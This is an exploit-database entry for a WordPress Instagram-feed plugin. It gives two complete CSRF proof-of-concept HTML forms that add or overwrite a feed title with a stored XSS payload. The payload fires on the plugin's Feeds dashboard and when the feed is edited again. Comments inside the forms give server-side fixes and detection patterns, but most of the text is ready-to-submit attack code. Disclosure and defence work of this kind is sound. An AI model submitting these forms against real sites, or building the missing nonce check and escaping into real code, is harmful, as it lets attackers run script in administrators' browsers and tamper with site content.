## https://sploitus.com/exploit?id=WPEX-ID:24AB2998-9FAF-46CA-9A80-F78136653DA0
Reproducible as any authenticated user, such as a subscriber, or via CSRF against such a user.

<html>
  <body>
    <!-- PoC request 1: creates a new feed (page=feeds-wisw, social=instagram, action=add).
         The request carries no nonce field (no _wpnonce input), so it can be submitted by
         any authenticated user, or replayed from a third-party page in that user's browser (CSRF).
         Server-side fix: verify a nonce (check_admin_referer()) and the caller's capability
         (current_user_can()) before the feed is written, and escape the stored title on output
         (esc_attr() / esc_html()) so it cannot be rendered as markup.
         Detection: POSTs to admin.php?page=feeds-wisw&action=add lacking _wpnonce, or a feed
         title containing "<" or ">" characters. -->
    <form action="http://example.com/wp-admin/admin.php?page=feeds-wisw&social=instagram&action=add" method="POST">
      <!-- Only this field carries the markup probe; per the note at the end of the page it is
           stored and rendered unescaped when the feed is edited again and on the Feeds dashboard. -->
      <input type="hidden" name="title" value='Social Slider"><svg/onload=alert(/XSS/)>' />
      <!-- The remaining fields appear to be the feed's ordinary settings (hedged: their exact
           meaning is not shown on this page); they are included so the save succeeds. -->
      <input type="hidden" name="search_for" value="hashtag" />
      <input type="hidden" name="username" value="" />
      <input type="hidden" name="hashtag" value="a" />
      <input type="hidden" name="blocked_users" value="" />
      <input type="hidden" name="refresh_hour" value="5" />
      <input type="hidden" name="images_number" value="20" />
      <input type="hidden" name="caption_words" value="20" />
      <input type="hidden" name="orderby" value="rand" />
      <input type="hidden" name="images_link" value="image_link" />
      <input type="hidden" name="custom_url" value="" />
      <input type="hidden" name="blocked_words" value="" />
      <input type="hidden" name="allowed_words" value="" />
      <input type="hidden" name="template" value="slider" />
      <input type="hidden" name="columns" value="4" />
      <input type="hidden" name="gutter" value="0" />
      <input type="hidden" name="masonry_image_width" value="200" />
      <input type="hidden" name="masonry_lite_cols" value="4" />
      <input type="hidden" name="masonry_lite_gap" value="10" />
      <input type="hidden" name="slick_img_size" value="300" />
      <input type="hidden" name="slick_slides_to_show" value="3" />
      <input type="hidden" name="slick_sliding_speed" value="5000" />
      <input type="hidden" name="highlight_offset" value="1" />
      <input type="hidden" name="highlight_pattern" value="6" />
      <input type="hidden" name="shopifeed_phone" value="" />
      <input type="hidden" name="shopifeed_color" value="#da004a" />
      <input type="hidden" name="shopifeed_columns" value="3" />
      <input type="hidden" name="controls" value="prev_next" />
      <input type="hidden" name="animation" value="slide" />
      <input type="hidden" name="slidespeed" value="7000" />
      <!-- Submit marker the plugin's handler keys on to perform the save. -->
      <input type="hidden" name="wis-feed-save-action" value="Save" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

<html>
  <body>
    <!-- PoC request 2: same weakness via the edit path (feed=4, action=edit) — an existing
         feed's title is overwritten with the markup probe. As with the add request there is
         no _wpnonce field, so the same nonce + capability check before the write, and output
         escaping of the title, close both paths. Feed id 4 is just the id used in this
         write-up; it has no special meaning. -->
    <form action="https://example.com/wp-admin/admin.php?page=feeds-wisw&social=instagram&feed=4&action=edit" method="POST">
      <!-- Markup probe stored in the feed title; rendered later per the closing note. -->
      <input type="hidden" name="title" value='Sub"><svg/onload=alert(/XSS/)>' />
      <!-- Ordinary feed settings (presumed; not described on this page), needed for the save. -->
      <input type="hidden" name="search_for" value="hashtag" />
      <input type="hidden" name="username" value="" />
      <input type="hidden" name="hashtag" value="" />
      <input type="hidden" name="blocked_users" value="" />
      <input type="hidden" name="refresh_hour" value="5" />
      <input type="hidden" name="images_number" value="20" />
      <input type="hidden" name="caption_words" value="20" />
      <input type="hidden" name="orderby" value="rand" />
      <input type="hidden" name="images_link" value="image_link" />
      <input type="hidden" name="custom_url" value="" />
      <input type="hidden" name="blocked_words" value="" />
      <input type="hidden" name="allowed_words" value="" />
      <input type="hidden" name="template" value="slider" />
      <input type="hidden" name="columns" value="4" />
      <input type="hidden" name="gutter" value="0" />
      <input type="hidden" name="masonry_image_width" value="200" />
      <input type="hidden" name="masonry_lite_cols" value="4" />
      <input type="hidden" name="masonry_lite_gap" value="10" />
      <input type="hidden" name="slick_img_size" value="300" />
      <input type="hidden" name="slick_slides_to_show" value="3" />
      <input type="hidden" name="slick_sliding_speed" value="5000" />
      <input type="hidden" name="highlight_offset" value="1" />
      <input type="hidden" name="highlight_pattern" value="6" />
      <input type="hidden" name="shopifeed_phone" value="" />
      <input type="hidden" name="shopifeed_color" value="#da004a" />
      <input type="hidden" name="shopifeed_columns" value="3" />
      <input type="hidden" name="controls" value="prev_next" />
      <input type="hidden" name="animation" value="slide" />
      <input type="hidden" name="slidespeed" value="7000" />
      <!-- Submit marker the plugin's handler keys on to perform the save. -->
      <input type="hidden" name="wis-feed-save-action" value="Save" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Despite the "Sorry, you are not allowed to access this page." error being displayed, the feed is still added or edited — the check that produces the error does not stop the write.

The stored payload is triggered when the feed is edited again, as well as on the Feeds dashboard (/wp-admin/admin.php?page=feeds-wisw).